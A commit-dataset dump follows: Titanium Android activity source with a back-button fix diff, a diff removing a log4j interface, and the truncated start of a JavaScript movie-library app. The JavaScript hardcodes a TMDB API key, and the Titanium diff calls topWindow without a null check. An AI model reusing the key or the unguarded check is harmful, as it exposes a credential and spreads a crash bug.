create in case the activity is externally created. TiPlatformHelper.getInstance().intializeDisplayMetrics(this); if (layout == null) { layout = createLayout(); } if (intent != null && intent.hasExtra(TiC.PROPERTY_KEEP_SCREEN_ON)) { layout.setKeepScreenOn(intent.getBooleanExtra(TiC.PROPERTY_KEEP_SCREEN_ON, layout.getKeepScreenOn())); } // Set the theme of the activity before calling super.onCreate(). // On 2.3 devices, it does not work if the theme is set after super.onCreate. int theme = getIntentInt(TiC.PROPERTY_THEME, -1); if (theme != -1) { this.setTheme(theme); } // Set ActionBar into split mode must be done before the decor view has been created // we need to do this before calling super.onCreate() if (intent != null && intent.hasExtra(TiC.PROPERTY_SPLIT_ACTIONBAR)) { getWindow().setUiOptions(ActivityInfo.UIOPTION_SPLIT_ACTION_BAR_WHEN_NARROW); } // we only want to set the current activity for good in the resume state but we need it right now. // save off the existing current activity, set ourselves to be the new current activity temporarily // so we don't run into problems when we give the proxy the event Activity tempCurrentActivity = tiApp.getCurrentActivity(); tiApp.setCurrentActivity(this, this); // we need to set window features before calling onCreate this.requestWindowFeature(Window.FEATURE_PROGRESS); this.requestWindowFeature(Window.FEATURE_INDETERMINATE_PROGRESS); if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) { this.requestWindowFeature(Window.FEATURE_ACTIVITY_TRANSITIONS); } super.onCreate(savedInstanceState); windowCreated(savedInstanceState); if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_CREATE, null); activityProxy.fireEvent(TiC.EVENT_CREATE, null); } // set the current activity back to what it was originally tiApp.setCurrentActivity(this, tempCurrentActivity); // If user changed the layout during app.js load, keep that if (!overridenLayout) { setContentView(layout); } // Set the title of the activity after setContentView. // On 2.3 devices, if the title is set before setContentView, the app will crash when a NoTitleBar theme is used. updateTitle(); sendMessage(msgActivityCreatedId); // for backwards compatibility sendMessage(msgId); // store off the original orientation for the activity set in the AndroidManifest.xml // for later use originalOrientationMode = getRequestedOrientation(); orientationListener = new OrientationEventListener(this, SensorManager.SENSOR_DELAY_NORMAL) { @Override public void onOrientationChanged(int orientation) { DisplayMetrics dm = new DisplayMetrics(); getWindowManager().getDefaultDisplay().getMetrics(dm); int width = dm.widthPixels; int height = dm.heightPixels; int rotation = getWindowManager().getDefaultDisplay().getRotation(); if ((rotation == Surface.ROTATION_90 || rotation == Surface.ROTATION_270) && rotation != previousOrientation) { callOrientationChangedListener(TiApplication.getAppRootOrCurrentActivity(), width, height, rotation); } else if ((rotation == Surface.ROTATION_0 || rotation == Surface.ROTATION_180) && rotation != previousOrientation) { callOrientationChangedListener(TiApplication.getAppRootOrCurrentActivity(), width, height, rotation); } } }; if (orientationListener.canDetectOrientation() == true) { orientationListener.enable(); } else { Log.w(TAG, "Cannot detect orientation"); orientationListener.disable(); } if (window != null) { window.onWindowActivityCreated(); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, savedInstanceState, TiLifecycle.LIFECYCLE_ON_CREATE); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } } public int getOriginalOrientationMode() { return originalOrientationMode; } public boolean isInForeground() { return inForeground; } protected void sendMessage(final int msgId) { if (messenger == null || msgId == -1) { return; } // fire an async message on this thread's queue // so we don't block onCreate() from returning TiMessenger.postOnMain(new Runnable() { public void run() { handleSendMessage(msgId); } }); } protected void handleSendMessage(int messageId) { try { Message message = TiMessenger.getMainMessenger().getHandler().obtainMessage(messageId, this); messenger.send(message); } catch (RemoteException e) { Log.e(TAG, "Unable to message creator. finishing.", e); finish(); } catch (RuntimeException e) { Log.e(TAG, "Unable to message creator. finishing.", e); finish(); } } protected TiActivitySupportHelper getSupportHelper() { if (supportHelper == null) { this.supportHelper = new TiActivitySupportHelper(this); // Register the supportHelper so we can get it back when the activity is recovered from force-quitting. supportHelperId = TiActivitySupportHelpers.addSupportHelper(supportHelper); } return supportHelper; } // Activity Support public int getUniqueResultCode() { return getSupportHelper().getUniqueResultCode(); } /** * See TiActivitySupport.launchActivityForResult for more details. */ public void launchActivityForResult(Intent intent, int code, TiActivityResultHandler resultHandler) { getSupportHelper().launchActivityForResult(intent, code, resultHandler); } /** * See TiActivitySupport.launchIntentSenderForResult for more details. */ public void launchIntentSenderForResult(IntentSender intent, int requestCode, Intent fillInIntent, int flagsMask, int flagsValues, int extraFlags, Bundle options, TiActivityResultHandler resultHandler) { getSupportHelper().launchIntentSenderForResult(intent, requestCode, fillInIntent, flagsMask, flagsValues, extraFlags, options, resultHandler); } @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { super.onActivityResult(requestCode, resultCode, data); synchronized (onActivityResultListeners.synchronizedList()) { for (OnActivityResultEvent listener : onActivityResultListeners.nonNull()) { try { TiLifecycle.fireOnActivityResultEvent(this, listener, requestCode, resultCode, data); } catch (Throwable t) { Log.e(TAG, "Error dispatching onActivityResult event: " + t.getMessage(), t); } } } getSupportHelper().onActivityResult(requestCode, resultCode, data); } @Override public void onBackPressed() { synchronized (interceptOnBackPressedListeners.synchronizedList()) { for (interceptOnBackPressedEvent listener : interceptOnBackPressedListeners.nonNull()) { try { if (listener.interceptOnBackPressed()) { return; } } catch (Throwable t) { Log.e(TAG, "Error dispatching interceptOnBackPressed event: " + t.getMessage(), t); } } } TiWindowProxy topWindow = topWindowOnStack(); if (topWindow != null && topWindow.hasListeners(TiC.EVENT_ANDROID_BACK)) { topWindow.fireEvent(TiC.EVENT_ANDROID_BACK, null); } // Override default Android behavior for "back" press // if the top window has a callback to handle the event. if (topWindow != null && topWindow.hasProperty(TiC.PROPERTY_ON_BACK)) { KrollFunction onBackCallback = (KrollFunction) topWindow.getProperty(TiC.PROPERTY_ON_BACK); onBackCallback.callAsync(activityProxy.getKrollObject(), new Object[] {}); } else { // there are no parent activities to return to // override back press to background the activity // note: 2 since there should always be TiLaunchActivity and TiActivity if (TiApplication.activityStack.size() <= 2) { if (topWindow != null && !TiConvert.toBoolean(topWindow.getProperty(TiC.PROPERTY_EXIT_ON_CLOSE), true)) { this.moveTaskToBack(true); return; } } // If event is not handled by custom callback allow default behavior. super.onBackPressed(); } } @Override public boolean dispatchKeyEvent(KeyEvent event) { boolean handled = false; TiViewProxy window; if (this.window != null) { window = this.window; } else { window = this.view; } if (window == null) { return super.dispatchKeyEvent(event); } switch(event.getKeyCode()) { case KeyEvent.KEYCODE_BACK : { if (event.getAction() == KeyEvent.ACTION_UP) { String backEvent = "android:back"; KrollProxy proxy = null; //android:back could be fired from a tabGroup window (activityProxy) //or hw window (window).This event is added specifically to the activity //proxy of a tab group in window.js if (activityProxy.hasListeners(backEvent)) { proxy = activityProxy; } else if (window.hasListeners(backEvent)) { proxy = window; } if (proxy != null) { proxy.fireEvent(backEvent, null); handled = true; } } break; } case KeyEvent.KEYCODE_CAMERA : { if (window.hasListeners(TiC.EVENT_ANDROID_CAMERA)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_CAMERA, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:camera")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:camera", null); } handled = true; } break; } case KeyEvent.KEYCODE_FOCUS : { if (window.hasListeners(TiC.EVENT_ANDROID_FOCUS)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_FOCUS, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:focus")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:focus", null); } handled = true; } break; } case KeyEvent.KEYCODE_SEARCH : { if (window.hasListeners(TiC.EVENT_ANDROID_SEARCH)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_SEARCH, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:search")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:search", null); } handled = true; } break; } case KeyEvent.KEYCODE_VOLUME_UP : { if (window.hasListeners(TiC.EVENT_ANDROID_VOLUP)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_VOLUP, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:volup")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:volup", null); } handled = true; } break; } case KeyEvent.KEYCODE_VOLUME_DOWN : { if (window.hasListeners(TiC.EVENT_ANDROID_VOLDOWN)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_VOLDOWN, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:voldown")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:voldown", null); } handled = true; } break; } } if (!handled) { handled = super.dispatchKeyEvent(event); } return handled; } @Override public boolean onCreateOptionsMenu(Menu menu) { // If targetSdkVersion is set to 11+, Android will invoke this function // to initialize the menu (since it's part of the action bar). Due // to the fix for Android bug 2373, activityProxy won't be initialized b/c the // activity is expected to restart, so we will ignore it. if (activityProxy == null) { return false; } boolean listenerExists = false; synchronized (onCreateOptionsMenuListeners.synchronizedList()) { for (OnCreateOptionsMenuEvent listener : onCreateOptionsMenuListeners.nonNull()) { try { listenerExists = true; TiLifecycle.fireOnCreateOptionsMenuEvent(this, listener, menu); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnCreateOptionsMenuEvent: " + t.getMessage(), t); } } } if (menuHelper == null) { menuHelper = new TiMenuSupport(activityProxy); } return menuHelper.onCreateOptionsMenu(super.onCreateOptionsMenu(menu) || listenerExists, menu); } @Override public boolean onOptionsItemSelected(MenuItem item) { switch (item.getItemId()) { case android.R.id.home: if (activityProxy != null) { ActionBarProxy actionBarProxy = activityProxy.getActionBar(); if (actionBarProxy != null) { KrollFunction onHomeIconItemSelected = (KrollFunction) actionBarProxy .getProperty(TiC.PROPERTY_ON_HOME_ICON_ITEM_SELECTED); KrollDict event = new KrollDict(); event.put(TiC.EVENT_PROPERTY_SOURCE, actionBarProxy); if (onHomeIconItemSelected != null) { onHomeIconItemSelected.call(activityProxy.getKrollObject(), new Object[] { event }); } } } return true; default: return menuHelper.onOptionsItemSelected(item); } } @Override public boolean onPrepareOptionsMenu(Menu menu) { boolean listenerExists = false; synchronized (onPrepareOptionsMenuListeners.synchronizedList()) { for (OnPrepareOptionsMenuEvent listener : onPrepareOptionsMenuListeners.nonNull()) { try { listenerExists = true; TiLifecycle.fireOnPrepareOptionsMenuEvent(this, listener, menu); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnPrepareOptionsMenuEvent: " + t.getMessage(), t); } } } return menuHelper.onPrepareOptionsMenu(super.onPrepareOptionsMenu(menu) || listenerExists, menu); } public static void callOrientationChangedListener(Activity activity, int width, int height, int rotation) { if (activity != null) { int currentOrientation = activity.getWindowManager().getDefaultDisplay().getRotation(); if (orientationChangedListener != null && previousOrientation != currentOrientation) { previousOrientation = currentOrientation; orientationChangedListener.onOrientationChanged (currentOrientation, width, height); } } } @Override public void onConfigurationChanged(Configuration newConfig) { super.onConfigurationChanged(newConfig); for (WeakReference<ConfigurationChangedListener> listener : configChangedListeners) { if (listener.get() != null) { listener.get().onConfigurationChanged(this, newConfig); } } } @Override protected void onNewIntent(Intent intent) { super.onNewIntent(intent); Log.d(TAG, "Activity " + this + " onNewIntent", Log.DEBUG_MODE); if (activityProxy != null) { IntentProxy ip = new IntentProxy(intent); KrollDict data = new KrollDict(); data.put(TiC.PROPERTY_INTENT, ip); activityProxy.fireSyncEvent(TiC.EVENT_NEW_INTENT, data); // TODO: Deprecate old event activityProxy.fireSyncEvent("newIntent", data); } } public void addOnLifecycleEventListener(OnLifecycleEvent listener) { lifecycleListeners.add(new WeakReference<OnLifecycleEvent>(listener)); } public void addOnInstanceStateEventListener(OnInstanceStateEvent listener) { instanceStateListeners.add(new WeakReference<OnInstanceStateEvent>(listener)); } public void addOnWindowFocusChangedEventListener(OnWindowFocusChangedEvent listener) { windowFocusChangedListeners.add(new WeakReference<OnWindowFocusChangedEvent>(listener)); } public void addInterceptOnBackPressedEventListener(interceptOnBackPressedEvent listener) { interceptOnBackPressedListeners.add(new WeakReference<interceptOnBackPressedEvent>(listener)); } public void addOnActivityResultListener(OnActivityResultEvent listener) { onActivityResultListeners.add(new WeakReference<OnActivityResultEvent>(listener)); } public void addOnCreateOptionsMenuEventListener(OnCreateOptionsMenuEvent listener) { onCreateOptionsMenuListeners.add(new WeakReference<OnCreateOptionsMenuEvent>(listener)); } public void addOnPrepareOptionsMenuEventListener(OnPrepareOptionsMenuEvent listener) { onPrepareOptionsMenuListeners.add(new WeakReference<OnPrepareOptionsMenuEvent>(listener)); } public void removeOnLifecycleEventListener(OnLifecycleEvent listener) { // TODO stub } private void dispatchCallback(String name, KrollDict data) { if (data == null) { data = new KrollDict(); } data.put("source", activityProxy); // TIMOB-19903 if (TiApplication.getInstance().runOnMainThread()) { // We must call this synchornously to ensure it happens before we release the Activity reference on the V8/Native side! activityProxy.callPropertySync(name, new Object[] { data }); } else { // This hopefully finishes before we release the reference on the native side?! I have seen it crash because it didn't before though... // Not sure it's safe to keep this behavior... activityProxy.callPropertyAsync(name, new Object[] { data }); } } private void releaseDialogs(boolean finish) { //clean up dialogs when activity is pausing or finishing for (Iterator<DialogWrapper> iter = dialogs.iterator(); iter.hasNext(); ) { DialogWrapper p = iter.next(); Dialog dialog = p.getDialog(); boolean persistent = p.getPersistent(); //if the activity is pausing but not finishing, clean up dialogs only if //they are non-persistent if (finish || !persistent) { if (dialog != null && dialog.isShowing()) { dialog.dismiss(); } dialogs.remove(p); } } } @Override public void onWindowFocusChanged(boolean hasFocus) { synchronized (windowFocusChangedListeners.synchronizedList()) { for (OnWindowFocusChangedEvent listener : windowFocusChangedListeners.nonNull()) { try { listener.onWindowFocusChanged(hasFocus); } catch (Throwable t) { Log.e(TAG, "Error dispatching onWindowFocusChanged event: " + t.getMessage(), t); } } } super.onWindowFocusChanged(hasFocus); } @Override /** * When this activity pauses, this method sets the current activity to null, fires a javascript 'pause' event, * and if the activity is finishing, remove all dialogs associated with it. */ protected void onPause() { inForeground = false; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_PAUSE, null); } super.onPause(); isResumed = false; Log.d(TAG, "Activity " + this + " onPause", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { releaseDialogs(true); if (!isFinishing()) { finish(); } return; } if (!windowStack.empty()) { windowStack.peek().onWindowFocusChange(false); } TiApplication.updateActivityTransitionState(true); tiApp.setCurrentActivity(this, null); TiUIHelper.showSoftKeyboard(getWindow().getDecorView(), false); if (this.isFinishing()) { releaseDialogs(true); } else { //release non-persistent dialogs when activity hides releaseDialogs(false); } if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_PAUSE, null); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_PAUSE); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } // Checkpoint for ti.background event if (tiApp != null && TiApplication.getInstance().isAnalyticsEnabled()) { analytics.sendAppBackgroundEvent(); } } @Override /** * When the activity resumes, this method updates the current activity to this and fires a javascript * 'resume' event. */ protected void onResume() { inForeground = true; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_RESUME, null); } super.onResume(); if (isFinishing()) { return; } Log.d(TAG, "Activity " + this + " onResume", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (!windowStack.empty()) { windowStack.peek().onWindowFocusChange(true); } tiApp.setCurrentActivity(this, this); TiApplication.updateActivityTransitionState(false); if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_RESUME, null); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_RESUME); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } isResumed = true; // Checkpoint for ti.foreground event //String deployType = tiApp.getAppProperties().getString("ti.deploytype", "unknown"); if(TiApplication.getInstance().isAnalyticsEnabled()){ analytics.sendAppForegroundEvent(); } } @Override /** * When this activity starts, this method updates the current activity to this if necessary and * fire javascript 'start' and 'focus' events. Focus events will only fire if * the activity is not a tab activity. */ protected void onStart() { inForeground = true; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_START, null); } super.onStart(); if (isFinishing()) { return; } // Newer versions of Android appear to turn this on by default. // Turn if off until an activity indicator is shown. setProgressBarIndeterminateVisibility(false); Log.d(TAG, "Activity " + this + " onStart", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { if (!isFinishing()) { finish(); } return; } updateTitle(); if (activityProxy != null) { // we only want to set the current activity for good in the resume state but we need it right now. // save off the existing current activity, set ourselves to be the new current activity temporarily // so we don't run into problems when we give the proxy the event Activity tempCurrentActivity = tiApp.getCurrentActivity(); tiApp.setCurrentActivity(this, this); activityProxy.fireEvent(TiC.EVENT_START, null); // set the current activity back to what it was originally tiApp.setCurrentActivity(this, tempCurrentActivity); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_START); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } // store current configuration orientation // This fixed bug with double orientation chnage firing when activity starts in landscape previousOrientation = getWindowManager().getDefaultDisplay().getRotation(); } @Override /** * When this activity stops, this method fires the javascript 'blur' and 'stop' events. Blur events will only fire * if the activity is not a tab activity. */ protected void onStop() { inForeground = false; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_STOP, null); } super.onStop(); Log.d(TAG, "Activity " + this + " onStop", Log.DEBUG_MODE); if (getTiApp().isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_STOP, null); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_STOP); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } KrollRuntime.suggestGC(); } @Override /** * When this activity restarts, this method updates the current activity to this and fires javascript 'restart' * event. */ protected void onRestart() { inForeground = true; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_RESTART, null); } super.onRestart(); Log.d(TAG, "Activity " + this + " onRestart", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (activityProxy != null) { // we only want to set the current activity for good in the resume state but we need it right now. // save off the existing current activity, set ourselves to be the new current activity temporarily // so we don't run into problems when we give the proxy the event Activity tempCurrentActivity = tiApp.getCurrentActivity(); tiApp.setCurrentActivity(this, this); activityProxy.fireEvent(TiC.EVENT_RESTART, null); // set the current activity back to what it was originally tiApp.setCurrentActivity(this, tempCurrentActivity); } } @Override /** * When the activity is about to go into the background as a result of user choice, this method fires the * javascript 'userleavehint' event. */ protected void onUserLeaveHint() { Log.d(TAG, "Activity " + this + " onUserLeaveHint", Log.DEBUG_MODE); if (getTiApp().isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_USER_LEAVE_HINT, null); } super.onUserLeaveHint(); } @Override /** * When this activity is destroyed, this method removes it from the activity stack, performs * clean up, and fires javascript 'destroy' event. */ protected void onDestroy() { Log.d(TAG, "Activity " + this + " onDestroy", Log.DEBUG_MODE); if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_DESTROY, null); } inForeground = false; TiApplication tiApp = getTiApp(); //Clean up dialogs when activity is destroyed. releaseDialogs(true); if (tiApp.isRestartPending()) { super.onDestroy(); if (!isFinishing()) { finish(); } return; } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_DESTROY); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } if (orientationListener != null) { orientationListener.disable(); orientationListener = null; } super.onDestroy(); boolean isFinishing = isFinishing(); // If the activity is finishing, remove the windowId and supportHelperId so the window and supportHelper can be released. // If the activity is forced to destroy by Android OS, keep the windowId and supportHelperId so the activity can be recovered. if (isFinishing) { int windowId = getIntentInt(TiC.INTENT_PROPERTY_WINDOW_ID, -1); TiActivityWindows.removeWindow(windowId); TiActivitySupportHelpers.removeSupportHelper(supportHelperId); } fireOnDestroy(); if (layout instanceof TiCompositeLayout) { Log.d(TAG, "Layout cleanup.", Log.DEBUG_MODE); ((TiCompositeLayout) layout).removeAllViews(); } layout = null; //LW windows if (window == null && view != null) { view.releaseViews(); view.release(); view = null; } if (window != null) { window.closeFromActivity(isFinishing); window.releaseViews(); window.removeAllChildren(); window.release(); window = null; } if (menuHelper != null) { menuHelper.destroy(); menuHelper = null; } if (activityProxy != null) { activityProxy.release(); activityProxy = null; } // Don't dispose the runtime if the activity is forced to destroy by Android, // so we can recover the activity later. KrollRuntime.decrementActivityRefCount(isFinishing); KrollRuntime.suggestGC(); } @Override protected void onSaveInstanceState(Bundle outState) { super.onSaveInstanceState(outState); // If the activity is forced to destroy by Android, save the supportHelperId so // we can get it back when the activity is recovered. if (!isFinishing() && supportHelper != null) { outState.putInt("supportHelperId", supportHelperId); } synchronized (instanceStateListeners.synchronizedList()) { for (OnInstanceStateEvent listener : instanceStateListeners.nonNull()) { try { TiLifecycle.fireInstanceStateEvent(outState, listener, TiLifecycle.ON_SAVE_INSTANCE_STATE); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnInstanceStateEvent: " + t.getMessage(), t); } } } } @Override protected void onRestoreInstanceState(Bundle savedInstanceState) { super.onRestoreInstanceState(savedInstanceState); if (savedInstanceState.containsKey("supportHelperId")) { supportHelperId = savedInstanceState.getInt("supportHelperId"); supportHelper = TiActivitySupportHelpers.retrieveSupportHelper(this, supportHelperId); if (supportHelper == null) { Log.e(TAG, "Unable to retrieve the activity support helper."); } } synchronized (instanceStateListeners.synchronizedList()) { for (OnInstanceStateEvent listener : instanceStateListeners.nonNull()) { try { TiLifecycle.fireInstanceStateEvent(savedInstanceState, listener, TiLifecycle.ON_RESTORE_INSTANCE_STATE); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnInstanceStateEvent: " + t.getMessage(), t); } } } } // called in order to ensure that the onDestroy call is only acted upon once. // should be called by any subclass protected void fireOnDestroy() { if (!onDestroyFired) { if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_DESTROY, null); } onDestroyFired = true; } } protected boolean shouldFinishRootActivity() { return getIntentBoolean(TiC.INTENT_PROPERTY_FINISH_ROOT, false); } @Override public void finish() { super.finish(); if (shouldFinishRootActivity()) { TiApplication app = getTiApp(); if (app != null) { TiRootActivity rootActivity = app.getRootActivity(); if (rootActivity != null && !(rootActivity.equals(this)) && !rootActivity.isFinishing()) { rootActivity.finish(); } else if (rootActivity == null && !app.isRestartPending()) { // When the root activity has been killed and garbage collected and the app is not scheduled to restart, // we need to force finish the root activity while this activity has an intent to finish root. // This happens when the "Don't keep activities" option is enabled and the user stays in some activity // (eg. heavyweight window, tabgroup) other than the root activity for a while and then he wants to back // out the app. app.setForceFinishRootActivity(true); } } } } // These activityOnXxxx are all used by TiLaunchActivity when // the android bug 2373 is detected and the app is being re-started. // By calling these from inside its on onXxxx handlers, TiLaunchActivity // can avoid calling super.onXxxx (super being TiBaseActivity), which would // result in a bunch of Titanium-specific code running when we don't need it // since we are restarting the app as fast as possible. Calling these methods // allows TiLaunchActivity to fulfill the requirement that the Android built-in // Activity's onXxxx must be called. (Think of these as something like super.super.onXxxx // from inside TiLaunchActivity.) protected void activityOnPause() { super.onPause(); } protected void activityOnRestart() { super.onRestart(); } protected void activityOnResume() { super.onResume(); } protected void activityOnStop() { super.onStop(); } protected void activityOnStart() { super.onStart(); } protected void activityOnDestroy() { super.onDestroy(); } public void activityOnCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); } /** * Called by the onCreate methods of TiBaseActivity to determine if an unsupported application * re-launch appears to be occurring. * @param activity The Activity getting the onCreate * @param savedInstanceState The argument passed to the onCreate. A non-null value is a "tell" * that the system is re-starting a killed application. */ public static boolean isUnsupportedReLaunch(Activity activity, Bundle savedInstanceState) { // We have to relaunch the app if // 1. all the activities have been killed and the runtime has been disposed or // 2. the app's hosting process has been killed. In this case, onDestroy or any other method // is not called. We can check the status of the root activity to detect this situation. if (savedInstanceState != null && !(activity instanceof TiLaunchActivity) && (KrollRuntime.isDisposed() || TiApplication.getInstance().rootActivityLatch.getCount() != 0)) { return true; } return false; } }
[TIMOB-24253] Fix androidback event
android/titanium/src/java/org/appcelerator/titanium/TiBaseActivity.java
[TIMOB-24253] Fix androidback event
<ide><path>ndroid/titanium/src/java/org/appcelerator/titanium/TiBaseActivity.java <ide> if (topWindow != null && topWindow.hasListeners(TiC.EVENT_ANDROID_BACK)) { <ide> topWindow.fireEvent(TiC.EVENT_ANDROID_BACK, null); <ide> } <del> <ide> // Override default Android behavior for "back" press <ide> // if the top window has a callback to handle the event. <ide> if (topWindow != null && topWindow.hasProperty(TiC.PROPERTY_ON_BACK)) { <ide> KrollFunction onBackCallback = (KrollFunction) topWindow.getProperty(TiC.PROPERTY_ON_BACK); <ide> onBackCallback.callAsync(activityProxy.getKrollObject(), new Object[] {}); <del> <del> } else { <add> } <add> if (!topWindow.hasProperty(TiC.PROPERTY_ON_BACK) && !topWindow.hasListeners(TiC.EVENT_ANDROID_BACK)) { <ide> // there are no parent activities to return to <ide> // override back press to background the activity <ide> // note: 2 since there should always be TiLaunchActivity and TiActivity
Java
apache-2.0
919a2db55bc66dc7442e5eb1ca95ac0875bb3a6c
0
prmsheriff/log4j,MuShiiii/log4j,prmsheriff/log4j,prmsheriff/log4j,prmsheriff/log4j,MuShiiii/log4j,prmsheriff/log4j,qos-ch/reload4j,smathieu/librarian_sample_repo_java,qos-ch/reload4j,MuShiiii/log4j,sreekanthpulagam/log4j,smathieu/librarian_sample_repo_java,sreekanthpulagam/log4j,MuShiiii/log4j,MuShiiii/log4j,sreekanthpulagam/log4j,sreekanthpulagam/log4j,sreekanthpulagam/log4j,qos-ch/reload4j
src/java/org/apache/log4j/spi/PropertyConfiguratorInterface.java
package org.apache.log4j.spi; import java.util.Properties; /** Implemented by classes capable of configuring log4j using Java properties files. @since 0.9.2 @author Anders Kristensen */ public interface PropertyConfiguratorInterface { /** Interprets the specified Properties map and configures log4j accordingly. */ void doConfigure(Properties props); }
Removed PropertyConfiguratorInterface.java as it is replaced by Configurator.java. git-svn-id: a7be136288eb2cd985a15786d66ec039c800a993@308905 13f79535-47bb-0310-9956-ffa450edef68
src/java/org/apache/log4j/spi/PropertyConfiguratorInterface.java
<ide><path>rc/java/org/apache/log4j/spi/PropertyConfiguratorInterface.java <del>package org.apache.log4j.spi; <del> <del>import java.util.Properties; <del> <del>/** <del> Implemented by classes capable of configuring log4j using Java <del> properties files. <del> <del> @since 0.9.2 <del> @author Anders Kristensen <del> */ <del>public interface PropertyConfiguratorInterface { <del> /** <del> Interprets the specified Properties map and configures <del> log4j accordingly. <del> */ <del> void doConfigure(Properties props); <del>}
JavaScript
cc0-1.0
6da3f10bbc5e464141fd3fd57f943294456dc31c
0
shrihari/moviemonkey,shrihari/moviemonkey
const remote = require('electron').remote; const app = remote.app; const path = require('path'); const forEachAsync = require('forEachAsync').forEachAsync; const omdbapi = require('omdbapi'); const tmdb = new (require('tmdbapi'))({ apiv3: '5d357768816b32bc2a1f43a06b62cf4c' }); const img_dl = require('image-downloader'); var libhash = require('opensubtitles-api/lib/hash.js'); var OS = require('opensubtitles-api'); var OpenSubtitles = new OS({ useragent:'Movie Monkey v2', username: '', password: '', ssl: true }); var tmdb_config = {}; // Swap this for formatList var toArray = function(o) { return Object.keys(o).map(k => o[k]) } export default class MovieMonkey { constructor(a, db) { this.app = a; this.movies_db = db; this.hashList = [], this.fileList = [], this.bytesizeList = []; this.movies = [], this.unidentified = []; tmdb.configuration() .then((res) => { tmdb_config = res['images']; }).catch(console.error); } insertIntoDB(hash, movie, tmovie, done) { let t = this; t.app.setState({status: {mode: 1, message: "�� Adding "+movie.title}}); t.movies_db.insert({ tmdb_id: tmovie['id'], poster_path: tmovie['poster_path'], backdrop_path: tmovie['backdrop_path'], hash: hash, fileName: t.fileList[t.hashList.indexOf(hash)], bytesize: t.bytesizeList[t.hashList.indexOf(hash)], imdbid: movie.imdbid, imdbrating: +movie.imdbrating, imdbvotes: +movie.imdbvotes.match(/\d/g).join(''), actors: (movie.actors) ? toArray(movie.actors) : null, awards: movie.awards, boxoffice: movie.boxoffice, country: (movie.country) ? toArray(movie.country) : null, directors: (movie.director) ? toArray(movie.director) : null, dvd: movie.dvd, genres: (movie.genre) ? toArray(movie.genre) : null, language: movie.language.split(', '), plot: movie.plot, production: movie.production, rated: movie.rated, released: new Date(movie.released), runtime: +movie.runtime.split(" min")[0], title: movie.title, type: "movie", writers: (movie.writer) ? toArray(movie.writer) : null, year: +movie.year, // rotten: movie.ratings[1].value.split("%")[0], 